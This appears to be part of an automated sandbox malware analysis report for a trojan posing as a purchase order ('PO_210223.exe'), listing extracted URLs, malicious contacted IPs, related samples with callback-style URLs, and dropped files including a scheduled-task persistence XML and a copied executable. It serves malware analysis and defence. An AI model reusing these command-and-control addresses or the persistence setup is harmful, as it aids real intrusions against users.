http://www.fontbureau.com/designersQ	PO_210223.exe, 00000000.00000003.654377069.0000000008285000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designersiva	PO_210223.exe, 00000000.00000003.658952636.0000000008285000.00000004.00000001.sdmp	false		high
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp	false		high
http://i3.cdn-image.com/__media__/pics/12471/arrow.png)	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	PO_210223.exe, 00000000.00000003.655856986.0000000008285000.00000004.00000001.sdmp, PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, PO_210223.exe, 00000000.00000003.646155016.000000000826B000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fonts.comic	PO_210223.exe, 00000000.00000003.645842271.000000000826B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i3.cdn-image.com/__media__/pics/12471/libgh.png)	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/pics/12471/logo.png)	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designerse	PO_210223.exe, 00000000.00000003.658906996.0000000008285000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	explorer.exe, 0000000A.00000002.910436982.0000000002B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.comig	PO_210223.exe, 00000000.00000003.648155639.000000000828D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comva9y	PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false		high
http://www.carterandcone.comcy	PO_210223.exe, 00000000.00000003.648075554.000000000828D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false		high
http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.comc	PO_210223.exe, 00000000.00000003.645891455.000000000826B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.comlic	PO_210223.exe, 00000000.00000003.649005992.0000000008252000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comk	PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/	PO_210223.exe, 00000000.00000003.647493837.0000000008252000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false		high
http://www.zhongyicts.com.cniy	PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comint	PO_210223.exe, 00000000.00000003.648075554.000000000828D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn	PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false		high
http://i3.cdn-image.com/__media__/pics/12471/libg.png)	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.comal	PO_210223.exe, 00000000.00000003.646155016.000000000826B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.monotype.	PO_210223.exe, 00000000.00000003.658733903.0000000008285000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pophazard.com/sk-logabpstatus.php?a=aG42QXdLZEpxVDR5Y2RqNUtBbnIvaUNNaWJVdEVQVjlJMUxVR2dwW	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com8i	PO_210223.exe, 00000000.00000003.649005992.0000000008252000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	false		high
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.comh	PO_210223.exe, 00000000.00000003.646155016.000000000826B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cnal9y	PO_210223.exe, 00000000.00000003.647493837.0000000008252000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/	PO_210223.exe, 00000000.00000003.652634958.0000000008285000.00000004.00000001.sdmp	false		high
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2	ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cnt7o	PO_210223.exe, 00000000.00000003.647129278.0000000008256000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
204.11.56.48	unknown	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
103.66.59.142	unknown	Hong Kong	40065	CNSERVERSUS	true
23.229.197.103	unknown	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356494
Start date:	23.02.2021
Start time:	08:57:40
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PO_210223.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@10/4@3/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 14.7% (good quality ratio 12.2%) Quality average: 64.6% Quality standard deviation: 36.1%
HCA Information:	Successful, ratio: 95% Number of executed functions: 97 Number of non-executed functions: 162
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.255.188.83, 51.104.139.180, 52.113.196.254, 104.43.139.144, 92.122.145.220, 168.61.161.212, 205.185.216.10, 205.185.216.42, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247, 51.104.144.132 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:58:35	API Interceptor	1x Sleep call for process: PO_210223.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
204.11.56.48	RFQ Manual Supersucker en Espaol.xlsx	Get hash	malicious	Browse	www.bigias.com/dgn/?Yzrp=LfNQbftNF2CZK3Pdbvfs/GUpg4UhIVB9HREii+G/2FPSQnC/ZhagFrpEcGqY3PnsjIPUew==&Lzrl=k6fTBXMx9H
	8nxKYwJna8.exe	Get hash	malicious	Browse	www.wood-decor24.com/csv8/?UT=EhUhb4&OjKL3=3r5dRtIFgT1VahUseje8ue8NA/87jk0khJCRLUJpCdq1RUr7MGeMpqJjvp2wRjK1uE1w
	win32.exe	Get hash	malicious	Browse	www.buythinsecret.com/incn/?8pBP5p=TJfvpzXJMrBT1in/CsTGivtbaFX6GTyf1u5RDlluSiJ51lGqZDPSCkL06IZ75j/ocR9F&L6Ah=2dSLFXghYtFd0
	mitbjisfe.js	Get hash	malicious	Browse	urchintelemetry.com/
	Details...exe	Get hash	malicious	Browse	www.coolgadgetsdominate.com/t052/?pPX=6CpI00+2HCKGB1JbH22k369411uOsTuNarkGYMnsdTbHzEXKI/PSljtTQWzMzlp4SIHA&1b=jnKtRfexr
	Fdj5vhj87S.exe	Get hash	malicious	Browse	www.buythinsecret.com/incn/?2de=TJfvpzXJMrBT1in/CsTGivtbaFX6GTyf1u5RDlluSiJ51lGqZDPSCkL06L5BpyfQG2cC&2dpxxT=i6MpbxRhTzX8wRbP
	Statement Of Account.exe	Get hash	malicious	Browse	www.perphaseelectronics.com/sz0m/?Kh=HN60TPe8&GvIHh=TGzqOvQKUvlZAzOTrBjC19//UpjckKets6PHJd4ZAWTshAj7ZEPkQjI0VseEDOP7xUYnIWwQiw==
	yxYmHtT7uT.exe	Get hash	malicious	Browse	www.wood-decor24.com/csv8/?Aro=3r5dRtIFgT1VahUseje8ue8NA/87jk0khJCRLUJpCdq1RUr7MGeMpqJjvqaKSimOtzUhnn+APQ==&EHU40X=gbWtoXjpHB
	spptqzbEyNlEJvj.exe	Get hash	malicious	Browse	www.become-flightattendant.com/umSa/?Bn=d8+Yc1Kqdgg0yWZra+sA0ykjlSaGatnyagLIGXz6IWosdhkxYMJxV2/awb2OazI1/ohH&Rv=Y2JToVAX_DCpOHB
	pHUWiFd56t.exe	Get hash	malicious	Browse	www.wood-decor24.com/csv8/?Rxl=3r5dRtIFgT1VahUseje8ue8NA/87jk0khJCRLUJpCdq1RUr7MGeMpqJjvqWKByqN0jU3&LJB=GbtlyLR0j
	Q38V8rfI5H.js	Get hash	malicious	Browse	legitville.com/0.html
	Q38V8rfI5H.js	Get hash	malicious	Browse	legitville.com/0.html
	Z4VzMe8IqZ.js	Get hash	malicious	Browse	urchintelemetry.com/
	Z4VzMe8IqZ.js	Get hash	malicious	Browse	urchintelemetry.com/
	test.bat	Get hash	malicious	Browse	local-update.com/banana.png
	SecuriteInfo.com.Heur.16160.xls	Get hash	malicious	Browse	www.heretangier.com/p2he/?cF=CXY0HpOvAiNao/7hyD46ZbvJkOBYOaiMbMD/1gQDGANTp/VCja9vaOiD7B1AqPi5K6pAxQ==&SBZ=epg8b
	YT0nfh456s.exe	Get hash	malicious	Browse	www.wood-decor24.com/csv8/?jFNHHj=3r5dRtIFgT1VahUseje8ue8NA/87jk0khJCRLUJpCdq1RUr7MGeMpqJjvqWKByqN0jU3&Ppd=_6g8yvxH-6HLN
	payment advise.exe	Get hash	malicious	Browse	www.couponquote.com/rbe/?8pV=_TJP3HkXZXxT3Te&lJBxWNm=NmtmFq3bM1GRjzQAFWXZGZs3nJJTmL04NhsM+Fht47V2qooXGZt1Rr5A9fSZbB9GvZz2
	NEW URGENT ORDER FROM PUK ITALIA GROUP SRL.EXE	Get hash	malicious	Browse	www.starstylishinstitute.com/k47/?r6=GbwDj4ypT&-ZU=33t3A7xB80u5YuyQF102BXSRJYIHEjWKu55cOthnVryNN9gNL+MJJIyFRKYoAf86uF3O
	Spisemuligheds4.exe	Get hash	malicious	Browse	www.momentsbyjordan.com/gpb6/?SBtxlt=lxlHQfw0FrIH&2d=gqgpWAjeEz0jXgJI2O1sVbKbB5UJYpIgFLCmC8Bdjh8wHvxJiiG9zRydokK2P49lkh4X

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CONFLUENCE-NETWORK-INCVG	AWB-INVOICE_PDF.exe	Get hash	malicious	Browse	208.91.197.91
	X1(1).xlsm	Get hash	malicious	Browse	66.81.204.228
	RFQ Manual Supersucker en Espaol.xlsx	Get hash	malicious	Browse	204.11.56.48
	X1(1).xlsm	Get hash	malicious	Browse	66.81.204.228
	DHL Document. PDF.exe	Get hash	malicious	Browse	208.91.197.91
	X1(1).xlsm	Get hash	malicious	Browse	66.81.204.228
	quotation10204168.dox.xlsx	Get hash	malicious	Browse	208.91.197.27
	CX2 RFQ.xlsm	Get hash	malicious	Browse	66.81.204.228
	CX2 RFQ.xlsm	Get hash	malicious	Browse	66.81.204.228
	C1.Qoute-Purequest Air Filtration Technologies (Pty) Ltd.xlsm	Get hash	malicious	Browse	66.81.204.228
	C1.Qoute-Purequest Air Filtration Technologies (Pty) Ltd.xlsm	Get hash	malicious	Browse	66.81.204.228
	C1.Qoute-Purequest Air Filtration Technologies (Pty) Ltd.xlsm	Get hash	malicious	Browse	66.81.204.228
	HEC Batangas Integrated LNG and Power Project DocumentationsType a message.exe.exe	Get hash	malicious	Browse	208.91.197.39
	Shipping Document PL&BL Draft.exe	Get hash	malicious	Browse	208.91.197.91
	0C18PUs3bt.exe	Get hash	malicious	Browse	208.91.197.27
	Quotation.exe	Get hash	malicious	Browse	209.99.64.55
	Credit Card & Booking details.exe	Get hash	malicious	Browse	208.91.197.27
	DnHeI10lQ6.exe	Get hash	malicious	Browse	209.99.40.222
	Quotation.exe	Get hash	malicious	Browse	209.99.64.55
	Payment advice.xls	Get hash	malicious	Browse	209.99.40.222
CNSERVERSUS	DHL Document. PDF.exe	Get hash	malicious	Browse	154.86.13.178
	SHED.EXE	Get hash	malicious	Browse	172.247.179.59
	#U6211#U662f#U56fe#U7247.exe	Get hash	malicious	Browse	23.224.244.116
	Parcel _009887 .exe	Get hash	malicious	Browse	45.205.32.159
	Swift_Payment_jpeg.exe	Get hash	malicious	Browse	154.91.163.79
	RFQ 2027376.xlsx	Get hash	malicious	Browse	23.224.206.44
	dll.dll	Get hash	malicious	Browse	154.222.24.167
	im.exe	Get hash	malicious	Browse	103.66.58.214
	8nxKYwJna8.exe	Get hash	malicious	Browse	156.251.194.127
	d6DdOfC2CX.exe	Get hash	malicious	Browse	154.202.47.2
	IRS_Microsoft_Excel_Document_xls.jar	Get hash	malicious	Browse	45.142.156.44
	WlBvCPCRcs.exe	Get hash	malicious	Browse	23.225.97.176
	8foMX5QfDT.exe	Get hash	malicious	Browse	104.255.229.20
	8GgbjB3BpU.exe	Get hash	malicious	Browse	172.83.155.157
	CMA CGM Shipping Documents COAU7014424560.xlsx	Get hash	malicious	Browse	23.225.97.176
	Inquiry_73834168_.xlsx	Get hash	malicious	Browse	154.91.154.163
	Report-preview01.20.exe	Get hash	malicious	Browse	172.83.155.149
	KtJsMM8kdE.exe	Get hash	malicious	Browse	156.251.194.127
	Fdj5vhj87S.exe	Get hash	malicious	Browse	154.91.154.163
	Shipping Document PL&BL Draft.exe	Get hash	malicious	Browse	104.255.229.21

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_210223.exe.log Download File
Process:	C:\Users\user\Desktop\PO_210223.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Temp\tmp33D2.tmp Download File
Process:	C:\Users\user\Desktop\PO_210223.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1642
Entropy (8bit):	5.176262409235197
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGGtn:cbhK79lNQR/rydbz9I3YODOLNdq3F
MD5:	14CFB330CC1F251E200D3DF339B27897
SHA1:	D203DB04E55F6224C704FBF3BF5A1654A22D4C24
SHA-256:	84CDADDE88E64BDF5193CBD7CA5FDAFF6C835E095EEE55053553413F7F3A588F
SHA-512:	EB556DCF6EAC7196F52C607803DFBE4DEF8B9346F5AA25FFE1B2BB850088E54524E6596F67B591BC0C2143B275C55001201B065E32CC752B197A30780B3BC2DF
Malicious:	true
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

C:\Users\user\AppData\Roaming\kwqifureL.exe Download File
Process:	C:\Users\user\Desktop\PO_210223.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	802304
Entropy (8bit):	7.2424881132869325
Encrypted:	false
SSDEEP:	12288:9ORam/OrNbZTlgJqfsRVeh58JtAZUdt4odT9YdxOI/aFOAhIE+TtORqH4O4H1rVR:QFiJNlFfdkP4odidxTCEd2
MD5:	E40AF9745E938B72D5D860BBC679AEBF
SHA1:	D9E750061417B0CA9F933DB79C99C12934ABBE84
SHA-256:	38ACC90CD6D33B61B99CCA8CF06781E1BD2AB8FFEBC3A33E036ECA36037D413B
SHA-512:	2124A0CB2135BFC5731554AAA534E6BA9063137450E5DF18A56C8DD661D8D926278C1D658F1AEF44D3522598E047F4735CA5A06CEF41BE3593101A089F3494BA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 43%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q4`..............P.............I... ...`....@.. ....................................@.................................XI..S....`............................................................................... ............... ..H............text....)... ..................... ..`.rsrc........`.......,..............@..@.reloc...............<..............@..B.................I......H.......HY..........B....O..X...........................................kh.6.v.h.j...@..'.h.BD..c."~-...^.....r.S...R....!.Z...#i......8..4.2,..5.aw!D...0.Z%....Z.w(....a...y..u...?.[...j....a0.`2.\........d..w..G..}.D....<..`.C.....A....5....s.A....U..Pff..DF.... N.g..e.(........3.).<..;6.F.x%...q.f.=+.Q............./A1CHt....2....G?.+..m...3.G.B...*...i.A..C......R...BE....R..b..1t....Z....z`..P.. ...~XS!R.(.........T.o....D...b..lM.<+0..p..$.fd......H..j

C:\Users\user\AppData\Roaming\kwqifureL.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\PO_210223.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.2424881132869325
